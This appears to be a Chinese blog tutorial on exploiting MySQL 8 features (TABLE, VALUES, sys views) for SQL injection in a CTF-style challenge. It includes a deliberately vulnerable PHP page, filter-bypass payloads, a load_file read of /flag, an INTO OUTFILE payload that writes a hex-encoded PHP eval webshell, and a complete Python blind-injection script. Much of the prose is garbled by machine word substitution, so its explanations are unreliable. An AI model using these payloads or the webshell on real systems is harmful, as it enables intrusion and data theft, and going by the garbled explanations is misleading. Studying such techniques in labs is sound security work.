从mysql8.0.21开始涌现的, table 关键字涌现的比较早,在8.0.19之后就有了,以是如果想要利用,还是先要试试这个表有没有,如果 mysql 版本恰好在 8.0.19-8.0.21 之间的话,就无法利用了
这个表好用就好用在,它直接存储了数据库和数据表
mysql> table information_schema.TABLESPACES_EXTENSIONS;+------------------+------------------+| TABLESPACE_NAME | ENGINE_ATTRIBUTE |+------------------+------------------+| mysql | NULL || innodb_system | NULL || innodb_temporary | NULL || innodb_undo_001 | NULL || innodb_undo_002 | NULL || sys/sys_config | NULL || test/users | NULL |+------------------+------------------+7 rows in set (0.02 sec)
除了可以用 information_schema.SCHEMA 、information_schema.TABLES 、information.COLUMNS 这些表来获取数据库名、表信息和字段信息,还有一些本身就处在 MySQL 内地表和视图可利用
mysql.innodb_table_statsmysql.innodb_index_stats
两表均有database_name和table_name字段
由于performance_schema过于繁芜,以是mysql在5.7版本中新增了sys.schemma,根本数据来自于 performance_chema 和 information_schema 两个库,本身数据库不存储数据。
表单或视图
存储数据库名字段
存储表单名字段
sys.innodb_buffer_stats_by_table
object_schema
object_name
sys.x$innodb_buffer_stats_by_table
object_schema
object_name
sys.schema_auto_increment_columns
table_schema
table_name
sys.schema_table_statistics
table_schema
table_name
sys.x$schema_table_statistics
table_schema
table_name
sys.schema_table_statistics_with_buffer
table_schema
table_name
sys.x$schema_table_statistics_with_buffer
table_schema
table_name
sys.schema_tables_with_full_table_scans
object_schema
object_name
sys.x$schema_tables_with_full_table_scans
object_schema
object_name
sys.io_global_by_file_by_latency
file字段包含数据名和表单名
file字段包含数据名和表单名
sys.x$io_global_by_file_by_latency
file字段包含数据名和表单名
file字段包含数据名和表单名
sys.io_global_by_file_by_bytes
file字段包含数据名和表单名
file字段包含数据名和表单名
sys.x$io_global_by_file_by_bytes
file字段包含数据名和表单名
file字段包含数据名和表单名
sys.x$schema_flattened_keys
table_schema
table_name
sys.x$ps_schema_table_statistics_io
table_schema
table_name
performance_schema.objects_summary_global_by_type
object_schema
object_name
performance_schema.table_handles
object_schema
object_name
performance_schema.table_io_waits_summary_by_index_usage
object_schema
object_name
performance_schema.table_io_waits_summary_by_table
object_schema
object_name
根据MySQL数据库中找的一些表单或视图里面的字段包含了数据库名和表单的信息,还有一些归纳总结
还有一些存储报错语句的和实行状态的表单或视图得知个中含有的数据库名和表单信息
视图
字段
sys.statements_with_errors_or_warnings
query
sys.statements_with_full_table_scans
query
sys.statement_analysis
query
sys.x$statement_analysis
query
performance_schema.events_statements_summary_by_digest
digest_text (查询记录)
performance_schema.file_instances
file_name (文件路径)
还可利用 information.schema.processlist 表读取正在实行的sql语句,从而得到表名与列名
新增功能tableTABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]]
官方文档描述和TABLE和SELECT有类似的功能
可以列出表的详细内容
但是与 SELECT 还是有差异的
TABLE始终显示表单中的所有列TABLE不许可对其进行任何过滤,即TABLE不支持任何WHERE子句坑点1:符号比较问题先看如下这种情形
用的是小于号,第一列的值是 mysql,如果是 l 的话确实 l 的 ascii 编码小于 m 的,得到的是1。但是如果是m 的话,就不是小于了而该当是即是,以是预期结果是返回0。
但实际上,这里纵然利用小于,比较的结果还是小于即是(≤)。以是须要将比较得到的结果的 ascii编码-1 再转换成字符才可以。
当然,反过来注入,从大的 ascii 编码往下注入到小的就没有这个问题了,例如下方的字符表(去掉了一些险些不会在mysql创建表中涌现的字符)
~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/-,+)(&%$#!
再来看另一种情形
创造在判断末了一位的时候,情形和之前又不一样了。末了一位的比较时候便是小于(<),而不是小于即是(≤)了。以是对付末了一位须要特殊把稳。
坑点2:字符转换与大小写问题先看如下例子
这里id是整型,而我们给出的字符型,当进行比较时,字符型会被逼迫转换为整型,而不是像之前一样读到了第一位往后没有第二位就会停滞,也便是都会逼迫转换为整型进行比较并且会一贯持续下去,以是往后写脚本当跑到末了一位的时候尤其须要把稳。
再来谈论一下大小写问题
lower_case_table_names 的值:
如果设置为 0,表名将按指定办法存储,并且在比拟表名时区分大小写。如果设置为 1,表名将以小写形式存储在磁盘上,在比拟表名时不区分大小写。如果设置为 2,则表名按给定格式存储,但以小写形式进行比较。此选项还适用于数据库名称和表别名。
由于 MySQL 最初依赖于文件系统来作为其数据字典,因此默认设置是依赖于文件系统是否区分大小写。
在 Windows 系统上,默认值为 1。在 macOS 系统上,默认值是 2。在 Linux 系统上,不支持值为 2;做事器会将该值设置为 0。
对付真正的数据表,如果不加上 binary 的话,是不区分大小写的
valueVALUES row_constructor_list [ORDER BY column_designator] [LIMIT BY number]row_constructor_list: ROW(value_list)[,ROW(value_list)][,...]value_list: value[,value][,...]column_designator: column_index
values 可以布局一个表
values 可以直接接在 union 后面,判断列数,效果同 union select
如果列数不对则会直接报错
mysql> select from users where id = 1 union values row(1,2,3,4);ERROR 1222 (21000): The used SELECT statements have a different number of columns
样例测试
给出一个关于mysql 8新特性的样例
<?php// index.phperror_reporting(0);require_once('config.php');highlight_file(__FILE__);$id = isset($_POST['id'])? $_POST['id'] : 1;if (preg_match("/(select|and|or| )/i",$id) == 1){ die("MySQL version: ".$conn->server_info);}$data = $conn->query("SELECT username from users where id = $id");foreach ($data as $users){ var_dump($users['username']);}?><?php// config.php$dbhost = 'localhost'; // mysql做事器主机地址$dbuser = 'root'; // mysql用户名$dbpass = 'root'; // mysql用户名密码$dbname = 'test'; // mysql数据库$conn = mysqli_connect($dbhost,$dbuser,$dbpass,$dbname);?>
很明确,禁用了 select,能显示部分结果,空格可以用 // 代替,可以通过 order by 测列数或者通过 union values 判断列数
id=0//union//values//row('injection')
效果如下
考试测验注出数据库
id=0//union//values//row(database())
当然这里可以通过以下两句
id=0//union//values//row(user())id=0//union//values//row(@@secure_file_priv)
来判断用户权限和是否可读写,假如可以读写则可以进行如下注入
id=0//union//values//row(load_file('/flag'))id=0//union//values//row(0x3c3f70687020406576616c28245f504f53545b615d293b3f3e)//into//outfile//'/var/www/html/shell.php'
本地环境为 windows 以是根目录不同
只能输出一个字段的内容,limit只能掌握行数,select 是可以掌握输出指定字段但是这里不许可,由于是 MySQL版本是 8.0.21 以是我们可以采取 table 和 小于号进行盲注,table 始终显示表的所有列,我们可以注个中一个字段,这里过滤了 or 以是打算采取另一个存储数据库名和表单名的视图 sys.schema_tables_with_full_table_scans, 这个视图本身的数据少方便我们征采,过滤了 and 和 or 可以采取 && 或者 ||
id=0||(binary't','',3,4)<(table//sys.schema_tables_with_full_table_scans//limit//0,1)
可以通过脚本注出第一个参数是 test 后紧接着注第一行第二个字段
id=0||('test',binary'u',3,4)<(table//sys.schema_tables_with_full_table_scans//limit//0,1)
第一位字符,MySQL8 此时小于号为小于即是以是第一位昔时夜于 u 时则返回0,也便是 0||0 无数据,但是小于即是 u 时返回为 0||1 返回 id=1 时的数据,通过此方向进行布尔盲注,末了注出 test 数据库中另一个表单名 flagishere。
不知道字段名也可以注入,还是通过 table 猜测字段个数然后带出每个字段的数据
id=0||('0',1)<(table//flagishere//limit//0,1)
由于只有一位, MySQL8 当作末了一位来看,小于号便是发挥小于的浸染,以是逼迫转换位整型后,0<1返回 1 则输出 id=1 的结果,而 1<1 返回 0 则不输出结果,末了便是总结,写个盲注的脚本
# --coding:utf-8--import requestsdef bind_sql(): flag = "" dic = "~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/-,+)(&%$#!" for i in range(1000): f = flag for j in dic: _ = flag + j # payload = "id=0||(binary'{}','',3,4)<(table//sys.schema_tables_with_full_table_scans//limit//0,1)".format(_) # payload = "id=0||('test',binary'{}',3,4)<(table//sys.schema_tables_with_full_table_scans//limit//0,1)".format(_) # payload = "id=0||('test',binary'{}',3,4)<(table//sys.schema_tables_with_full_table_scans//limit//2,1)".format(_) # payload = "id=0||(1,binary'{}',3)<(table//users//limit//0,1)".format(_) # payload = "id=0||('1','admin',binary'{}')<(table//users//limit//0,1)".format(_) payload = "id=0||('1',binary'{}')<(table//flagishere//limit//0,1)".format(_) print(payload) data = { "id": payload } res = requests.post(url=url, data=data) if 'admin' in res.text: # 匹配字段末了一位须要加1, 也便是匹配出 admim 实在是 admin if j == '~': flag = flag[:-1] + chr(ord(flag[-1])+1) print(flag) exit() flag += j print(flag) break if flag == f: break return flagif __name__ == '__main__': # input url url = 'http://localhost/CTF/test88/index.php' result = bind_sql() print(result)
我整理了干系的学习资料和工具,有须要的朋友关注私我哦!
!
!